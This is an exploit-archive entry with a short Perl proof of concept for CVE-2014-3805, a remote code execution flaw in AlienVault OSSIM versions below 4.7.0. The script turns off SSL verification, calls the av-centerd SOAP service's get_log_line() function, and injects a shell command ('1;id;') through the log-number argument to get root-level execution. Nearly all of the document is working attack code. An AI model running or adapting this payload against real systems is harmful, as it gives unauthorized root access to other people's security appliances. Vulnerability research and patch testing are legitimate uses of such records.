# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: < 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805
#!perl -w
use
SOAP::Lite;
# SSL is self-signed so we have to ignore verification.
$ENV
{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
# We simply append the 'id' command to the number of log we want to
# read.
@soap_response
= SOAP::Lite
-> uri(
'AV/CC/Util'
)
-> proxy(
'https://172.26.22.2:40007/av-centerd'
)
-> get_log_line(
'All'
,
'423d7bea-cfbc-f7ea-fe52-272ff7ede3d2'
,
'172.26.22.1'
,
'test'
,
'/var/log/auth.log'
,
'1;id;'
)
-> result;
for
(@{
$soap_response
[0] }) {
print
"$_\n"
;
}
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)